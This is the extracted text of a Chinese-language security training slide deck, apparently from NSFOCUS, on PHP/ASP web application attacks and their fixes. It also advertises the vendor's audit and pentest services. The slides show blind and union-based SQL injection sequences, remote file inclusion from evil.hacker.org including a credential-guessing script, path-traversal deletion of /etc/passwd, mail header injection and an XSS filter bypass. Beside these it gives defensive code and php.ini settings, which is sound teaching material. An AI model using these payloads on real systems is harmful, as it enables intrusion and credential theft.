    44. 47. <Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result... &quot;; } ?> <ul><ul><li> </li></ul></ul>select * from user where username like ‘ %$search_name %‘ order by id desc <ul><ul><li> </li></ul></ul>Search page: 确定
    45. 48. select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
    46. 49. <Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update... &quot;; } ?> <ul><ul><li> </li></ul></ul>update user set passwd='$passwd' where uid='$uid' <ul><ul><li> </li></ul></ul>Update your password: 确定
    47. 50. update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
    48. 51. Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … <ul><ul><li>MYSQL SERVER 将 varchar 值“ luyq@#11” 转换时发生语法错误。 /show/query.php ,第 87 行 </li></ul></ul><ul><ul><li>Password 是 luyq@#11 </li></ul></ul>Attacker FALSE FALSE
    49. 52. Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
    50. 53. show_source() highlight_string() highlight_file() Other Show error message function… <ul><ul><li> Take care </li></ul></ul>error_reporting() Php.ini ------- display_errors = off <ul><ul><li> Better </li></ul></ul>
    51. 54. 1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
    52. 55. Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
    53. 56. Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
    54. 57. Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
    55. 58. 1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
    56. 59. Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
    57. 60. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
    58. 61. Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
    59. 62. Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
    60. 63. Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:oot.ini
    61. 64. 合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
    62. 65. 客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案 <ul><ul><li>输入 </li></ul></ul><ul><ul><li>输入 </li></ul></ul>绕过客户端检查 否 是 是 否 客户端 服务端
    63. 66. < > & ‘ “ + ; {Whitespace} % / # Danger !
    64. 67. addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
    65. 68. 入侵技术交流 防御 恶意文件执行
    66. 70. Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
    67. 71. <?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
    68. 72. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
    69. 73. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo &quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password &quot;; } } ?>
    70. 74. <ul><ul><li> Right </li></ul></ul>allow_url_fopen allow_url_include($file) <ul><ul><li> Advise </li></ul></ul><?php include($_GET['file'].&quot;.php&quot;); ?> <?php $page = array( 'contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'); if (array_key_exists($_GET['file'], $page)) { include('/full/path/'.$page[$_GET['file']]); } ?> <ul><ul><li> Wrong </li></ul></ul>
    71. 75. Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
    72. 76. <?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
    73. 77. <ul><ul><li> Right </li></ul></ul><ul><ul><li> Better </li></ul></ul><?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; $file_to_delete = basename(&quot;$userfile&quot;); // 去除变量中的路径 unlink ($homedir/$file_to_delete); $fp = fopen(&quot;/home/logging/filedelete.log&quot;,&quot;+a&quot;); // 记录删除动作 $logstring = &quot;$username $homedir $file_to_delete&quot;; fwrite ($fp, $logstring); fclose($fp); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename'); // 停止执行代码 if (!ereg('^[^./][^/]*$', $username)) die('bad username'); // 停止执行代码 ?>
    74. 78. <ul><ul><li> And </li></ul></ul>只给 PHP 的 web 用户很有限的权限!
    75. 79. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
    76. 80. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.org Bcc:evil@example.com Reply-To:evil2@example.com
    77. 81. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { print &quot;Error post &quot;; } else mail($to, $subject, $message, $from ); ?> <ul><ul><li> Right </li></ul></ul><?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { write_logs(IP MESSAGE); print “U IP has been log… &quot;; } else mail($to, $subject, $message, $from ); ?> <ul><ul><li> Better </li></ul></ul>
    78. 82. 入侵技术交流 防御 CSRF
    79. 84. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
    80. 85. Attacker Myspace <ul><ul><li>Post <div style=“background:url()”> </li></ul></ul>Cool ! Post <script.*> 、 onclick, 、 <a href=javascript://> … False <ul><ul><li>Post <divstyle=“background:url(‘javascript:evil()’)”> </li></ul></ul>False <ul><ul><li>Post <divstyle=“background:url(‘java script:evil()’)”> </li></ul></ul>False <ul><ul><li>Post <divstyle=“background:url(‘java&#58script:evil()’)”> </li></ul></ul>Cool!!!Hello,web worm!
    81. 86. 入侵技术交流 防御 配置错误
    82. 87. Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
    83. 88. <ul><ul><li> Wrong </li></ul></ul>
    84. 89. <ul><ul><li> Right </li></ul></ul>
    85. 90. php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
    86. 91. 入侵技术交流 防御 身份认证漏洞
    87. 92. Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
    88. 93. <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ... ?> <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { die(&quot;Authorization required&quot;); } ... ?> <ul><ul><li> Wrong </li></ul></ul><ul><ul><li> Right </li></ul></ul>
    89. 94. <ul><ul><li> Better </li></ul></ul><ul><ul><li> Advise </li></ul></ul><?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { mail(&quot;admin@example.com&quot;, &quot;Possible breakin attempt&quot;, $_SERVER['REMOTE_ADDR']); echo &quot;Security violation, Admin has been alerted.&quot;; exit; } ... ?> register_globals = off error_reporting(E_ALL); <ul><ul><li> And </li></ul></ul>
    90. 95. <?php if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we can guest it ” ?> <ul><ul><li> W rong </li></ul></ul><ul><ul><li> Right </li></ul></ul><?php Session_start(); if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { session_regenerate_id (); } print “we can guest it ” ?>
    91. 96. 入侵技术交流 防御 存储缺陷
    92. 97. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
    93. 98. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
    94. 99. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
    95. 100. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
    96. 101. admin@#$%! 0x120a1b2649c88aef29edd2ffd7359d73 <ul><ul><li> W rong </li></ul></ul><ul><ul><li> Right </li></ul></ul>
    97. 102. <?php // 存储密码散列 $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <ul><ul><li> Rigth </li></ul></ul>
    98. 103. md5(uniqid(rand(), true)) <ul><ul><li>B etter than </li></ul></ul>md5(uniqid(rand()) <ul><ul><li> C ookie </li></ul></ul>
    99. 104. Php.ini session.save_path <ul><ul><li> S ession </li></ul></ul>
    100. 105. 攻击技术交流 防御 HTTP 数据传输
    101. 106. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
    102. 107. Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
    103. 108. Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
    104. 109. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
    105. 110. C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
    106. 111. Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
    107. 112. 入侵技术交流 防御 访问控制缺陷
    108. 113. Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
    109. 114. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
    110. 115. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
    111. 116. 入侵技术交流 防御 WEB2.0 时代
    112. 117. 用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript 浏览器 服务端 <ul><ul><li> Web 1.0 </li></ul></ul><ul><ul><li> Web 2.0 </li></ul></ul>
    113. 118. <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
    114. 119. 攻 防
    115. 120. register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
    116. 121. 绿盟科技专业服务 代码审计服务 渗透测试服务
    117. 122. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, $username, $password); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <ul><ul><li> 代码审计服务 </li></ul></ul>绿盟科技安全小组使用白盒 (White Box) 测试对源代码进行审计,找出编程缺陷,并提供改进建议及最佳安全编码实践。
    118. 123. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <ul><ul><li> 代码审计服务 </li></ul></ul>
    119. 124. Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。 <ul><ul><li> 渗透测试服务 </li></ul></ul>Pen-test Team Web Server Succeed Succeed Succeed
    120. 125. <ul><ul><li>此广告位 招租 </li></ul></ul><ul><ul><li>请联系 68730606-8502 </li></ul></ul><ul><ul><li>按出价高低顺序约谈… </li></ul></ul>
    121. 127. Professional Security Solution Provider Thanks!

    ×